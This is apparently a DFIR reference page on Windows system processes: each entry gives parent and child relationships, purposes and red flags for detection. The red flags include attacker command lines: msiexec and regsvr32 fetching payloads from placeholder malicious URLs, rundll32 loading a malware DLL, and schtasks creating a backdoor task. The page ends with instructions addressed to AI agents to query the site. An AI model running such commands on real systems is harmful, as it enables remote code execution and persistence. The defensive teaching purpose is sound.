# 🔹 Windows System Processes ### **🔹 Windows System Processes** #### 1️⃣ **System Idle Process (PID 0)** * **Parent:** None (it is created by the Windows kernel) * **Child:** None (does not spawn any processes) * **Purpose:** Represents unused CPU resources; does not execute code. #### 2️⃣ **System Process (PID 4)** * **Parent:** None (created by the Windows Kernel) * **Child:** Handles low-level kernel processes like drivers. * **Purpose:** Manages hardware interactions and kernel operations. #### 3️⃣ **smss.exe (Session Manager Subsystem)** * **Parent:** `System (PID 4)` * **Child:** `winlogon.exe`, `csrss.exe` * **Purpose:** Manages system sessions, initializes the registry, and starts critical system processes. #### 4️⃣ **csrss.exe (Client/Server Runtime Subsystem)** * **Parent:** `smss.exe` * **Child:** None * **Purpose:** Handles console windows, GUI elements, and thread creation. #### 5️⃣ **wininit.exe (Windows Initialization Process)** * **Parent:** `smss.exe` * **Child:** `services.exe`, `lsass.exe` * **Purpose:** Initializes system services during boot-up. #### 6️⃣ **services.exe (Service Control Manager)** * **Parent:** `wininit.exe` * **Child:** Various Windows services (`svchost.exe`, `spoolsv.exe`, etc.) * **Purpose:** Manages Windows services. #### 7️⃣ **lsass.exe (Local Security Authority Subsystem)** * **Parent:** `wininit.exe` * **Child:** None (but can be targeted for credential dumping) * **Purpose:** Manages authentication and security policies. #### 8️⃣ **explorer.exe (Windows Explorer)** * **Parent:** `winlogon.exe` * **Child:** `cmd.exe`, `notepad.exe`, `chrome.exe` (user-launched apps) * **Purpose:** Provides the desktop, taskbar, and file browsing interface. #### 9️⃣ **cmd.exe (Command Prompt)** * **Parent:** `explorer.exe` (when opened by a user) * **Child:** `powershell.exe`, `whoami.exe`, etc. * **Purpose:** Runs command-line instructions. #### 🔟 **powershell.exe** * **Parent:** `cmd.exe` or `explorer.exe` * **Child:** Various scripts or executables. * **Purpose:** Executes PowerShell scripts and commands. #### 1️⃣1️⃣ **rundll32.exe** * **Parent:** `explorer.exe`, `cmd.exe` * **Child:** Can execute malicious DLLs if misused. * **Purpose:** Loads and executes DLL files. #### 1️⃣2️⃣ **wmiprvse.exe (WMI Provider Host)** * **Parent:** `services.exe` * **Child:** Various WMI queries * **Purpose:** Executes WMI scripts for system management. #### 1️⃣3️⃣ **taskhost.exe / taskhostw\.exe** * **Parent:** `services.exe` * **Child:** Hosts dynamic Windows services. * **Purpose:** Executes DLL-based services. ### **🔹 Additional Critical Windows Processes** #### **1️⃣ winlogon.exe (Windows Logon Application)** * **Parent:** `smss.exe` * **Child:** `userinit.exe`, `explorer.exe` * **Purpose:** Handles user login, logoff, and lock screen. * **Red Flags:** Malware can inject into `winlogon.exe` for persistence (e.g., `Winlogon Registry Notification` abuse). *** #### **2️⃣ userinit.exe** * **Parent:** `winlogon.exe` * **Child:** `explorer.exe`, `cmd.exe` * **Purpose:** Runs after login, initializes user environment. * **Red Flags:** If replaced by malware, it can execute malicious scripts on login. *** #### **3️⃣ explorer.exe** * **Parent:** `userinit.exe` * **Child:** User-launched apps (`chrome.exe`, `notepad.exe`, etc.) * **Purpose:** Handles the desktop, taskbar, and file browsing. * **Red Flags:** If `explorer.exe` spawns `cmd.exe` or `powershell.exe`, it could indicate script execution or malware activity. *** #### **4️⃣ msiexec.exe (Windows Installer)** * **Parent:** `explorer.exe` or `services.exe` * **Child:** Can spawn installation processes. * **Purpose:** Handles the installation of `.msi` files. * **Red Flags:** Attackers can use `msiexec.exe` for **LOLBin (Living Off the Land Binaries)** execution (`msiexec.exe /q /i http://malicious-url.com/malware.msi`). *** #### **5️⃣ wscript.exe & cscript.exe (Windows Scripting Hosts)** * **Parent:** `explorer.exe`, `cmd.exe` * **Child:** Script execution (`.vbs`, `.js`). * **Purpose:** Executes VBScript (`wscript.exe`) and command-line scripts (`cscript.exe`). * **Red Flags:** Often used by malware for fileless attacks. *** #### **6️⃣ rundll32.exe** * **Parent:** `explorer.exe`, `cmd.exe` * **Child:** Loads DLLs. * **Purpose:** Executes functions in DLLs. * **Red Flags:** Attackers use it to execute malware-laden DLLs (`rundll32.exe malware.dll, Start`). *** #### **7️⃣ regsvr32.exe (Registry Server)** * **Parent:** `cmd.exe`, `explorer.exe` * **Child:** Registers/Unregisters COM DLLs. * **Purpose:** Registers system DLLs. * **Red Flags:** Used in **Squiblydoo Attack** to bypass defenses (`regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll`). *** #### **8️⃣ conhost.exe (Console Window Host)** * **Parent:** `cmd.exe`, `explorer.exe` * **Child:** `powershell.exe`, `notepad.exe` * **Purpose:** Provides console window support. * **Red Flags:** If conhost is running in unusual locations (`C:\Users\Public\conhost.exe`), it might be malware. *** #### **9️⃣ dllhost.exe (COM Surrogate)** * **Parent:** `explorer.exe` * **Child:** Handles DLL-based processes. * **Purpose:** Supports COM objects execution. * **Red Flags:** If running without an associated process, it may be malware (`dllhost.exe` used for **Process Hollowing**). *** #### **🔟 werfault.exe (Windows Error Reporting)** * **Parent:** `services.exe` * **Child:** None (Handles error reporting). * **Purpose:** Collects error reports and crash dumps. * **Red Flags:** Attackers can **disable werfault.exe** to prevent crash reports from being logged. *** #### **1️⃣1️⃣ consent.exe (UAC Prompt)** * **Parent:** `winlogon.exe` * **Child:** Elevates processes requiring Admin rights. * **Purpose:** Handles UAC prompts. * **Red Flags:** If bypassed, attackers can escalate privileges. *** #### **1️⃣2️⃣ taskeng.exe (Task Scheduler Engine)** * **Parent:** `services.exe` * **Child:** Scheduled tasks. * **Purpose:** Executes scheduled tasks. * **Red Flags:** Used in **persistence** (`schtasks.exe /create /tn Backdoor /tr "C:\malware.exe"`). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mahmoud-shaker.gitbook.io/dfir-notes/windows-system-processes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.